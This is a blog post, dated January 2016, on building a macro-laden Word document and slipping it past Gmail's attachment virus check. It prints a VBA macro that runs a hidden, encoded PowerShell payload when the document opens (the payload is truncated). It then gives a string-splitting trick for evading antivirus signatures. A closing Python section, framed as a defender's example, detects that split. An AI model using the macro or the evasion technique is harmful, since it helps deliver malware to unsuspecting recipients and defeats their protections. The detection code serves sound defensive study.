# Bypassing Gmail Attachment Virus Check

*Note: This was posted in January 2016*

So today, whilst doing some practice on creating trojanised Microsoft Word documents, I came across an issue: Gmail by default runs a virus check on attachments, which gets in the way if you want to send a malicious attachment out.

To insert a payload into the Word document, I firstly created a template which looked like the one below.

![](/files/-LQ2vn-fZR-TSP3JlIVz)

After doing so, creating the macro using AutoOpen and Document\_Open was trivial. I made use of a PowerShell one-liner payload along with process creation to launch PowerShell using an encrypted payload. Using PowerShell Empire’s default copy-and-paste macro stager, this is detected.

Sample payload:

```
Sub AutoOpen()
    Debugging
End Sub

Sub Document_Open()
    Debugging
End Sub

Public Function Debugging() As Variant
    Dim Str As String
    Str = "powershell.exe -NoP -NonI -W Hidden -Enc JAB3AGMAP"
    Str = Str + "QBOAGUAVwAtAE8AYgBKAGUAQwB0ACAAUwB5AFMAVABlAE0ALgB"
    ' <snip to save space and sensitivity>
    Str = Str + "ATwBJAG4AJwAnACkA"
    Const HIDDEN_WINDOW = 0
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objProcess.Create Str, Null, objConfig, intProcessID
End Function
```

What I did was begin removing lines of code and kept re-uploading the document as a Gmail attachment until it was no longer detected as a virus.

I made adjustments to the payload, trying to identify which string or pattern the AV was picking up. I quickly realised that it was the fact that “-Enc” was part of the payload.

To resolve this, I split the “-Enc” string into “-E” and “nc” and then concatenated them back together. For example:

```
Dim Yops As String
Yops = "powershell.exe -Enc PAYLOADHERE"
```

This would be translated to the following:

```
Dim Yops As String
Yops = "powershell.exe -E"
Yops = Yops + "nc PAYLOADHERE"
```

However, this technique did not work. My next thought was that the “Yops” string is checked at the end, after all the concatenation, to determine whether “-Enc” is followed by “powershell.exe”. Therefore what I did was the following, and it bypassed the virus checks.

```
Dim Yops As String
Dim Yolo As String
Yops = "powershell.exe -E"
Yolo = "nc PAYLOAD"
Yops = Yops + Yolo + "HERE"
```

This quickly bypassed the antivirus feature on Gmail’s attachments and I was able to send the payload to my other machine for testing.
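The three snippets above build the same string; what changes is only how the macro text looks, so a scanner that matches the source line by line stops firing as soon as the flag is split. The following Python is added here as a defender's example (not part of the original post) and shows a check that constant-folds VBA string assignments and concatenations before matching; the VBA fragment and the `powershell ... -enc` signature are constructed for illustration, modelled on the post's final snippet and on the pattern the post infers Gmail keyed on.

```python
import re
# Constructed VBA fragment modelled on the post's final snippet (not the post's own
# payload): half of the "-Enc" flag travels through a second variable.
SPLIT_VIA_VARIABLE = '''
Dim Yops As String
Dim Yolo As String
Yops = "powershell.exe -E"
Yolo = "nc PAYLOAD"
Yops = Yops + Yolo + "HERE"
'''
# Assumed signature: the "powershell ... -enc" pairing the post infers Gmail keyed on.
ENC_PATTERN = re.compile(r'powershell(?:\.exe)?.*\s-enc\b', re.IGNORECASE)
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')  # Dim/Set/Const lines do not match

def _split_operands(rhs):
    """Split a VBA expression on + or & that sit outside string literals."""
    parts, buf, in_str = [], [], False
    for ch in rhs:
        if ch == '"':
            in_str = not in_str
        if ch in '+&' and not in_str:
            parts.append(''.join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append(''.join(buf).strip())
    return parts

def fold_strings(vba_source):
    """Constant-fold string assignments; names lower-cased (VBA is case-insensitive)."""
    env = {}
    for m in filter(None, map(ASSIGN.match, vba_source.splitlines())):
        name, value = m.group(1).lower(), ''
        for op in _split_operands(m.group(2)):
            if len(op) >= 2 and op[0] == op[-1] == '"':
                value += op[1:-1].replace('""', '"')   # string literal
            elif op.lower() in env:
                value += env[op.lower()]                # previously folded variable
            else:
                value = None                            # not a pure string expression
                break
        if value is not None:
            env[name] = value
    return env

def raw_line_hits(vba_source):          # naive: match each source line as written
    return [l.strip() for l in vba_source.splitlines() if ENC_PATTERN.search(l)]

def folded_hits(vba_source):            # match what the macro actually builds at run time
    return {k: v for k, v in fold_strings(vba_source).items() if ENC_PATTERN.search(v)}
```

On the split fragment `raw_line_hits` returns nothing while `folded_hits` recovers `powershell.exe -Enc PAYLOADHERE` under `yops`, which is the gap the post exploits.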

